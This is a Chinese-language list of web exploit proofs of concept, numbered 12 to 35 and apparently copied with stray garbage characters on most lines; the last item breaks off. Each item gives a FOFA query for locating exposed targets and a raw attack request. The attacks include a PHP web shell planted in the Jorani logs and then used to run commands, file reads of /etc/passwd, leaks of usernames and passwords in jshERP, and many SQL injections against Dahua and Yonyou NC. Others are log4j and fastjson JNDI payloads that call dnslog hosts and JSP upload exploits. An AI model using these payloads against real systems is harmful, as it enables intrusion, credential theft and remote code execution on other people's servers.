9 j2 h# @0 E" Z: AGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1# _+ s: E! p) j' U l' L) _% F/ {) ^2 r
Host: 127.0.0.1
7 G8 r& A, F! z: [0 d* [6 UPragma: no-cache
% V6 k! Y; x5 `7 n4 I8 e( S0 lCache-Control: no-cache
( R, A5 u# B. X( s& q% @' n/ \Upgrade-Insecure-Requests: 1
) g8 t7 T6 b' s. W% W$ p" cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, m' `. L& Q( u' A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, ^6 {/ ]) }& l- x* |6 ?5 l4 Y
Accept-Encoding: gzip, deflate6 [3 g9 r! G i6 W4 W
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
- l6 ]* `& \2 e* O! W3 i* ~* pConnection: close) u" M: s k* @: u2 ^* U
0 q9 p' w5 N$ X# X' e) B, e
+ Q- o' N! M, B7 g6 z$ P V: `
12. Jorani < 1.0.2 远程命令执行5 Z2 ?) B( m3 \+ {
FOFA:title="Jorani"7 t# x% |' Q1 ]5 {
第一步先拿到cookie
6 F4 o. l$ u. wGET /session/login HTTP/1.1# \3 j4 z; L! S9 _3 v
Host: 192.168.190.30- \/ ~- }$ z c+ J) {# c
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
+ ~' k) J, Y0 o2 z4 KConnection: close( ?+ C% i s( u& H: ]
Accept-Encoding: gzip
6 U5 U% O4 [% r
5 _! t3 U3 k/ R6 _: |# a8 X
m7 }8 m2 N l7 @% ^响应中csrf_cookie_jorani用于后续请求! I: T- y. {& T% d( M/ T& J! v# Y
HTTP/1.1 200 OK
' ~. [. V, ^- d9 P! `Connection: close {* v% X+ ^% ^+ z
Cache-Control: no-store, no-cache, must-revalidate9 c+ b0 K- o* B& [/ d3 E( m6 ]+ [
Content-Type: text/html; charset=UTF-8
- s0 e$ o: r/ O/ XDate: Tue, 24 Oct 2023 09:34:28 GMT n( f- w% I9 `$ I) P, G- u3 J% E: a
Expires: Thu, 19 Nov 1981 08:52:00 GMT
4 C3 |2 f9 ^' ]5 RLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
/ z6 P8 Y7 [' p, b) Y$ aPragma: no-cache
% c, j4 N# K' MServer: Apache/2.4.54 (Debian)
. T# i" D9 q8 N0 m1 ZSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
+ b. `0 ]; N( ]( c% i* RSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
; u% \4 v x, B: g4 w8 [* t) u7 dVary: Accept-Encoding
4 b' P% {: u. Q9 v9 @0 b7 T$ J: v- L) u$ ?( K7 U
4 K" l. o2 V, `8 \: y9 {$ k6 ~POST请求,执行函数并进行base64编码
- L0 S' u7 _: T3 x% ^5 U* m, LPOST /session/login HTTP/1.1
* M0 H- F( D& m, C5 W8 ?. ?) X, LHost: 192.168.190.30
9 g" m9 w. z; l& t+ j) |. bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
# P; [* e: x, m3 l$ j; [Connection: close4 ~% R0 N$ a8 V; R B3 I2 i( h
Content-Length: 252' N( U" r; D" g& @
Content-Type: application/x-www-form-urlencoded. D* ~& z6 n. b; {( D
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r- d' ^& Z! k3 K) z+ F
Accept-Encoding: gzip& u2 q; f0 G" u5 J
/ k U: o8 s. V3 Vcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
# s; j% J# ^5 j, O# ]8 ~3 I% g6 ~
; ?1 e4 Q7 I$ W8 K2 y) g$ `+ X
. G, l2 k- x/ N6 p. T
4 ]9 k! m: L6 F( ?, e; b* n向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串& q' K6 ]) Q) k- U7 t, T
GET /pages/view/log-2023-10-24 HTTP/1.1
) q& w$ E9 P4 O' r+ hHost: 192.168.190.302 U, I M! _9 K9 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ S( w; I) S. `0 I% F6 Z
Connection: close
! S5 u' B$ ]* O j) b5 G: T8 q5 TCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r7 G% [, w3 y2 m, q& M4 C R
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=8 } E i) E4 W# C/ }
X-REQUESTED-WITH: XMLHttpRequest
& {, v: K A2 C& }$ QAccept-Encoding: gzip6 N# j4 v$ K. S: A
4 g* [. l, ]: z% G! U
! A' y; f3 b; `; D0 o. G13. 红帆iOffice ioFileDown任意文件读取
Z1 d( A$ ` @2 V/ s& E! kFOFA:app="红帆-ioffice"
+ A" z9 \: ~( q! e8 A, eGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
+ F9 r, B8 w8 m0 O7 M3 oHost: x.x.x.x2 \* S5 n8 p; w9 @5 z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36, n! X- B5 P6 {( O+ R) ~" M
Connection: close
* U* Z' u, k* }; Q9 s$ f4 hAccept: */*
* S/ ]( D/ w% C2 F/ V3 NAccept-Encoding: gzip
/ M* G- b) H( c% _0 R9 L5 c( }- {. @1 n/ M
7 o( \1 n: i2 G# `
14. 华夏ERP(jshERP)敏感信息泄露; ]$ b; w" K2 A, {& i* U# S: Q
FOFA:body="jshERP-boot"
1 O; h; x5 p5 Z' s, P* E泄露内容包括用户名密码
& w" B; X+ M7 v0 b( X& OGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
( C6 |. O6 C5 W% q6 g8 JHost: x.x.x.x
1 |: b, X) d' F( s5 y* YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
/ d6 J4 F7 I2 P! N$ R+ IConnection: close1 @0 z- y6 L2 ]" Y @& K
Accept: */*
! t5 |# `& l4 o2 cAccept-Language: en) V# l# X9 @3 u
Accept-Encoding: gzip/ d+ L2 }1 s8 @+ D9 W* W7 }1 x/ ]
( c$ ^3 a/ \* f" v, ] j
3 j1 F& s, `5 Z/ V15. 华夏ERP getAllList信息泄露8 ~6 O+ o9 v$ C8 ?& T. h% _1 p+ N
CVE-2024-04904 \5 I+ C* o* d1 g4 A
FOFA:body="jshERP-boot" v! J. ^ ^' f) J
泄露内容包括用户名密码* h5 E; `8 t8 Z6 {: D }
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
: v% ^* M$ q' C2 V' e* k6 lHost: 192.168.40.130:100/ N" d0 G1 ~0 r; Z8 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
% s0 |% C1 [1 l3 m2 w+ `/ ]6 y) CConnection: close$ {' v0 N' W/ C5 I
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
' M2 D/ I, D( k* `Accept-Language: en
5 y2 ~7 y w4 \sec-ch-ua-platform: Windows
: |# s: U& W% V! B( s! VAccept-Encoding: gzip
6 o7 a8 ~) z# R$ a2 x) V
5 {1 Q* O: ~+ t9 K
# i4 x# \9 X, t16. 红帆HFOffice医微云SQL注入* O! P; R8 ^4 m$ _
FOFA:title="HFOffice"
$ B' T. O B' _2 dpoc中调用函数计算1234的md5值" X$ n% K( A8 R2 ~
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1/ ^' `5 B" @9 B' ?
Host: x.x.x.x
" m0 L5 h. X5 }User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36: a, {! i# k4 q4 l, w* E
Connection: close( N) u; v. C9 u" O
Accept: */*5 s6 J# l2 C% y
Accept-Language: en# `- Q: ^" ` N( j1 H* h
Accept-Encoding: gzip
) W1 K% G/ g M1 L2 t/ D! @% z" |
% d6 Y) R( l3 A$ e17. 大华 DSS itcBulletin SQL 注入& k9 u" R" r0 i
FOFA:app="dahua-DSS"
$ q' [2 L; X0 k, f' xPOST /portal/services/itcBulletin?wsdl HTTP/1.1% Z' M3 M8 f n V. O
Host: x.x.x.x4 i/ r; |$ z$ Z; z7 y' M3 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) p+ T( Y% o7 |. C
Connection: close
7 I! T3 w( M5 o3 X9 H1 R/ ZContent-Length: 345
r |( d3 C, X7 V1 X4 |4 ~Accept-Encoding: gzip1 L3 K) ^5 ? ^9 U4 K' r0 G6 y- e
) i2 q8 I- Z! ^ o' z0 @<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
$ N8 x# Z, W1 f; a<s11:Body>) P5 ^3 c: X1 H6 ~0 u6 @
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>: Y( Z' ^ W- n& S; Y z9 P
<netMarkings>
# }+ M# ]0 z$ w2 I (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1& |+ v, D4 Q5 ?% w/ p: Y8 e; T
</netMarkings>/ I- G' i& }) D
</ns1:deleteBulletin>7 }5 l7 g: U! B5 O2 e8 Y# P. k
</s11:Body>4 ~$ p( b; i3 i" a
</s11:Envelope>
) T* @; z' d" e8 n5 K9 H0 Z
+ L1 d; e+ R; \* G- _: [& [ p, u
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
N; X2 u( y' `8 p! {4 u9 }: YFOFA:app="dahua-DSS"
: I, @1 t) [+ a6 e% I. fGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1/ Q) j7 P( t1 E+ t# O
Host: your-ip
8 T8 m$ t- s# w2 D& C0 D# KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( F# u @: k- GAccept-Encoding: gzip, deflate9 x! p4 x1 P' e# v" b* d
Accept: */*
; e$ P! g' ] c" eConnection: keep-alive% V8 F& j1 Z2 v/ p* h0 Q' X, S
! X9 e* U1 h1 Q4 M) |+ E) s5 Q: C0 B4 N, [. A0 d# `8 \: z
$ P* j! R4 g# k9 F
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
4 ]" W! i- n' m* z3 k; `, LFOFA:app="dahua-DSS"
) [. M; ?7 m/ xGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.12 U* v5 d) i" @
Host:
4 m5 r* [# f& L5 ~User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) C+ r' ` I+ S/ B& W. k$ tAccept-Encoding: gzip, deflate
+ T% N. |2 T1 Q, s5 V9 r2 BAccept: */*, Z0 b$ J' w+ P6 w) O
Connection: keep-alive
7 i" e3 D3 l$ v' C
) V1 `. q0 w$ k) z, X1 q5 m6 f- @! g) {( r- O
20. 大华ICC智能物联综合管理平台任意文件读取% ]9 {) p; j. f8 D
FOFA:body="*客户端会小于800*"
9 ^! W& `3 T0 H/ G3 \+ [8 ^GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
" Z9 q; t, O+ v0 ^3 m5 f5 | _ BHost: x.x.x.x. Y& h' { h( z5 U+ |
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- }6 t$ ^6 k- d2 S( ^
Connection: close3 k3 A$ }5 W- e9 }& J
Accept: */*
( M A( v4 o$ Z) s3 E& IAccept-Language: en
, s4 X- w& e+ Y2 x0 X3 G" AAccept-Encoding: gzip
, T5 {" O- _+ R+ ~0 o! W M8 @: s" g1 r) u/ }. D& n5 u
$ b0 y# o% k% v( A21. 大华ICC智能物联综合管理平台random远程代码执行
! n8 k2 S8 ^: v! z# V. uFOFA:icon_hash="-1935899595"8 Z2 |6 ?" v* Z6 j+ I
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
4 D4 `% }9 f' O0 p5 [Host: x.x.x.x
/ L# z( o5 A c. f/ i6 P" H5 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 Y3 x7 C1 o- G6 {+ i( v
Content-Length: 1616 f% G \ j2 Z+ |
Accept-Encoding: gzip1 n( ?% X* Q% W; H# @4 ~
Connection: close" d+ D) P3 u/ D; m. t' }; o( W; E; j$ O
Content-Type: application/json;charset=utf-8% i3 h8 M+ j6 B& P4 `+ j
b- }& N; Z9 y5 J{0 r- F, P" y/ \; Q! E
"a":{
$ J! Y% F- I* d" g( B3 h "@type":"com.alibaba.fastjson.JSONObject",
- v- ~) l& L1 n" N+ D {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
" r3 E) R+ S9 b2 C, F }""
1 {* o. _( N v0 K9 }}; Y- b7 @- ~" e1 w7 p5 u- W% l P& b1 q
7 i& t. Z& f1 e7 q9 Z# Y* d
' e, L& J2 e/ [. l, M22. 大华ICC智能物联综合管理平台 log4j远程代码执行. U1 N$ `; G1 K+ I0 y5 j$ p
FOFA:icon_hash="-1935899595"7 u$ ?4 Y4 u, \0 j% m
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1& a4 @' R5 I5 B; |8 O, b) X7 r7 d
Host: your-ip. |/ c& I. z( C# h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; O; @ K0 X$ Z3 ~: A
Content-Type: application/json;charset=utf-8
. w* A$ q3 L4 U- b: q
4 X$ j9 p' v* G- z{
+ b& {: O0 u9 ^: v: I1 B"loginName":"${jndi:ldap://dnslog}"
/ {' H! c2 G$ A4 \}
0 [2 l0 m2 S, a. \9 v5 A" n! e' ~
8 Y9 o$ ?+ _6 V" X6 @
1 t. j; J" k8 N: P6 n
, _0 H5 ]/ I/ ^) m7 I& r5 P2 N5 E23. 大华ICC智能物联综合管理平台 fastjson远程代码执行2 A% b& D& N2 u) z' M- y+ j
FOFA:icon_hash="-1935899595"+ R. o u$ a( a( F* H) m# L
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
$ a0 t% y/ I' D& d2 q7 PHost: your-ip
! }$ _3 K3 `8 g# \0 n7 o( `1 r: BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. ] c. o' D+ R8 C+ ]! X2 [Content-Type: application/json;charset=utf-8, _6 Y& s1 ~+ t0 X
Accept-Encoding: gzip* N! u- b6 c- b5 I# O. w! {
Connection: close9 b) ]3 J! C# I" \
7 P+ f5 K2 n" z# P6 |
{
1 B# O# K0 \4 L; B1 b9 r( {- E "a":{
2 W5 }' l# j& d) T "@type":"com.alibaba.fastjson.JSONObject",1 _- W: a( W% s: u: z
{"@type":"java.net.URL","val":"http://DNSLOG"}
, n" a8 u& k m2 \' D7 w$ ?, @ }""
7 l% x! S' r# l/ V}6 k Y- \! Z k& A$ B
! m5 G' Y+ I+ i
4 x! \1 {2 e. L w$ R24. 用友NC 6.5 accept.jsp任意文件上传4 R# c$ z+ R0 X4 K6 L' O3 ]+ G/ ]8 P
FOFA:icon_hash="1085941792"
( d+ W& @; w8 M% zPOST /aim/equipmap/accept.jsp HTTP/1.13 K+ m, n8 p4 O6 H0 d/ T. }% w
Host: x.x.x.x& h; u$ @2 S9 l$ [0 p* {: g* O6 k
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
9 \# i+ U- w, D' wConnection: close
/ Q+ |3 K3 I; c- T" E+ TContent-Length: 449
: Y! {4 b$ u+ G. H; M7 vAccept: */*. r5 } t, t3 r: u
Accept-Encoding: gzip
$ p G, P% W x, e$ \, G1 LContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc. H) U5 \1 w2 r9 O3 i) _
0 U* z1 O. |! y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc, t8 `" t8 u7 Z5 `% p# ^- V0 r
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"+ @- m* s7 D# r* G$ H
Content-Type: text/plain
8 B# N% P9 b; z3 d6 d# V
* u; @' [! s: W- p<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
3 w4 C) D8 [8 }7 ]2 {4 [-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
) l+ m' J5 J; hContent-Disposition: form-data; name="fname"
& R7 {1 n! ~, S' Z" \
/ l3 x2 A' V [/ u5 z3 z\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp: `# A- [. I" j8 y2 q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
/ c2 \9 G5 U3 O+ D; W5 c# E0 K$ H$ C& }1 B- g+ ^+ l3 r& b
3 }* s9 p4 e. |25. 用友NC registerServlet JNDI 远程代码执行% Q) A0 f# q* j4 D! e
FOFA:app="用友-UFIDA-NC"" I6 t7 r) u- g7 r% y
POST /portal/registerServlet HTTP/1.1) T: V Y' Y. S& e' `% X$ Q B
Host: your-ip
+ Q9 Y4 V% Y9 r; n. M7 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.08 I/ X# s2 G; d4 E. R& \/ g$ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
- w3 E, ]" J# C/ I. s, kAccept-Encoding: gzip, deflate
3 o/ @1 m; y9 j1 {Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
" W& c* H2 p, g! p( |# OContent-Type: application/x-www-form-urlencoded3 }: E0 i# h8 ]! z' O G7 F3 y9 S
+ u6 |# R, F3 g+ q1 L6 X7 Z2 O
type=1&dsname=ldap://dnslog f2 C x0 W+ M& V' k( p% l$ U& z
. ^1 C. S" o* b$ {: a7 W- k
: \. f" E! y7 U
0 P6 S: n% C# d! e2 ^8 M26. 用友NC linkVoucher SQL注入/ m9 }9 ?& a) a" y2 H$ ~
FOFA:app="用友-UFIDA-NC"
4 N6 T$ L4 L, X [GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) P' J! O0 d' t( t' q3 {" E/ M% l4 yHost: your-ip
' T0 k& n+ o5 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( ?1 K( _1 M- w- ?5 N- p$ j" |+ a
Content-Type: application/x-www-form-urlencoded+ e' A$ v1 z! b- ]" _5 T. @
Accept-Encoding: gzip, deflate1 C% G) w3 E9 I( r
Accept: */*0 k0 r8 |/ e6 Y3 C
Connection: keep-alive
3 X7 i, ~' V* r+ B1 K- s- B# K, b4 C2 P# J# y3 g
1 D9 [% G& Y$ g; [) e8 V6 N& g
27. 用友 NC showcontent SQL注入
) U1 r. M- d( z0 TFOFA:icon_hash="1085941792"# G" k. _) I& b. I0 D- L8 g& F; r H
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
: v1 }9 o* ?/ R2 N, |9 kHost: your-ip
3 l. ^0 h/ g, n8 Y. z5 {$ L" x& I$ z3 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ I( W0 `* p$ v
Accept-Encoding: identity
" a' | p9 g% MConnection: close ?+ a7 Z/ x7 {5 N9 @
Content-Type: text/xml; charset=utf-8
8 T) l; h0 O) r m; @% {
1 \+ E4 j# r3 }# z
9 |9 G2 A7 d6 N28. 用友NC grouptemplet 任意文件上传# p) e0 z6 M% h C0 J& [) Z( h6 ?% N3 y
FOFA:icon_hash="1085941792"
" y! `! @! `$ v! C1 OPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
/ J6 j+ D$ h4 T3 M- b! _Host: x.x.x.x5 y$ a) v! F+ v3 ?: g \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36# C, e" C2 h8 h0 }, p- j1 \
Connection: close" Z! \ h& @& B
Content-Length: 268
) m9 V6 q# g- R1 n5 }; E* }Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
: Y7 K6 h. `! k7 ^) A) eAccept-Encoding: gzip8 `6 c" ~) I1 e' \
7 w9 M; U& @9 J' S; @ k9 u8 }------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
, L$ q6 Y1 k6 R3 r( DContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
5 l7 E$ ]: K' e3 lContent-Type: application/octet-stream
Y: V% G6 X) p# |0 ^$ t- `4 K9 W: u6 Z
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>8 p, u* a, a# Q2 Z5 ~; ?% \
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
5 ~& }2 t0 z; D3 W
4 t/ t$ x3 {0 `+ V& \& n6 v- @% t7 [& m! r2 R9 T! h3 R
/uapim/static/pages/nc/head.jsp
2 r" X9 M/ h9 x) j: H1 n/ P7 A& `, _1 G" M& N( V8 }$ }
29. 用友NC down/bill SQL注入7 Q3 `# z" o( I! U- V0 [
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! w0 G& t# o! M9 O! I6 \GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1* P/ o y" U Q, }5 K
Host: your-ip
! E* r( j) b, ~* _# `0 d3 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* d8 A; U8 W0 [: B
Content-Type: application/x-www-form-urlencoded7 J# _7 x; Q8 J. u6 X6 v5 R: h
Accept-Encoding: gzip, deflate8 U& ?( z8 C8 N
Accept: */*) J; T5 u* Q6 r0 C
Connection: keep-alive
4 ]6 c4 ]; F1 ], O* S! t R* g1 I5 W9 O! n( k; o' f' I# A+ @
( G. f0 E# ]9 u v) V: r! `9 }
30. 用友NC importPml SQL注入
' v/ D/ k1 ]* m3 _) E; kFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
2 L: N5 v3 Z9 yPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
, l. _$ ?! Y4 w7 b: ^6 eHost: your-ip* |1 X/ J& T1 D k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
& ]" U: U4 x" r. h1 x# dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
* k7 z& ?: P/ p: A# ~1 P- yConnection: close
* E( w$ N4 [3 N& y4 P' ~
7 `. t& U/ b1 H# q, X) x; x& y------WebKitFormBoundaryH970hbttBhoCyj9V
1 N* a6 T# h- O; u4 l# C- `Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
, O" d6 {) V, L0 jContent-Type: image/jpeg! w1 L5 B. ~( c# G$ b5 _
------WebKitFormBoundaryH970hbttBhoCyj9V--
8 x2 ?/ E4 P9 x0 {7 O* e/ R+ [, m4 t/ e' V
/ N; K) ^( {2 E
31. 用友NC runStateServlet SQL注入
6 G. g [( P( B' ~version<=6.5: _' u1 d) ]/ g1 f) z4 X& ^; E
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"" |3 e1 d- [2 u1 B6 T' _* r, X
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1" P8 n7 ?% d ]6 w7 ] m3 B
Host: host
6 B) w8 V- b8 S& u% aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! E& U2 b3 }3 ]" y% _6 Z: LContent-Type: application/x-www-form-urlencoded4 B0 E9 ~8 |/ P- }, J
$ H* z# u% O' S. d2 h$ Z
! U4 g8 t5 K( W; l32. 用友NC complainbilldetail SQL注入
& X6 m d3 A2 H0 ~% {2 k+ Eversion= NC633、NC65
: H" s/ o7 ~0 N5 a* Z) A+ tFOFA:app="用友-UFIDA-NC"5 w6 ]/ Q2 T/ b5 L3 |
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1: w, T! E L E! G
Host: your-ip
( p( v$ c) F+ G# o+ K/ \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 ?# w& Q2 O! H$ N. XContent-Type: application/x-www-form-urlencoded& T T6 R+ Z" O, O6 f9 r
Accept-Encoding: gzip, deflate v4 H. h+ E. X2 W$ M6 z1 G# Y& Y5 W
Accept: */*: D2 a# z/ x( I1 a X' ^" x0 |# U
Connection: keep-alive/ D; |, o/ _ j( \4 a9 i
/ D7 |& T5 X8 t4 i
/ ]& w9 H1 l6 D- h" B33. 用友NC downTax/download SQL注入0 g @/ G" h" ~3 r7 ~4 j
version:NC6.5FOFA:app="用友-UFIDA-NC"
0 A h4 k: x4 yGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1% a' T; z: k; v) p! W
Host: your-ip
, a# |9 c5 P3 `4 m# BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; K. J) {, k' sContent-Type: application/x-www-form-urlencoded
5 G" A$ u* g; EAccept-Encoding: gzip, deflate& @) w; q& g% r0 C% y( J
Accept: */*9 ^5 |9 o) Q7 h( b p) L; I
Connection: keep-alive
! u& V' d' P' o
. d5 _! `2 V! P# Y
" ~' Z- ?) w1 ]# U9 i0 W34. 用友NC warningDetailInfo接口SQL注入! m4 w* v* Z' h+ {; _5 ~
FOFA:app="用友-UFIDA-NC"' C+ p* N" G$ [; `3 N6 h4 @
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
& e% ?- P3 E6 l4 Y+ |$ j% l. @Host: your-ip/ M* K8 a# [1 d- ?( |- q0 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" ~$ V' N/ h/ V* p* E% q: N
Content-Type: application/x-www-form-urlencoded
8 r9 e6 ?# s1 h# c: ~3 c, jAccept-Encoding: gzip, deflate
% k6 ~" _! Y, v- `Accept: */*
# }9 T0 Q* ~8 M6 k$ XConnection: keep-alive
3 O6 [) a/ f3 x/ v; A' W' [
3 |" S" B3 P& q5 S, z# G K7 C) N5 h' `- T7 G/ [# ]* r7 \
35. 用友NC-Cloud importhttpscer任意文件上传
; c: s0 J2 _; v0 \& y8 C+ oFOFA:app="用友-NC-Cloud") z m3 b2 V4 A! w* ~
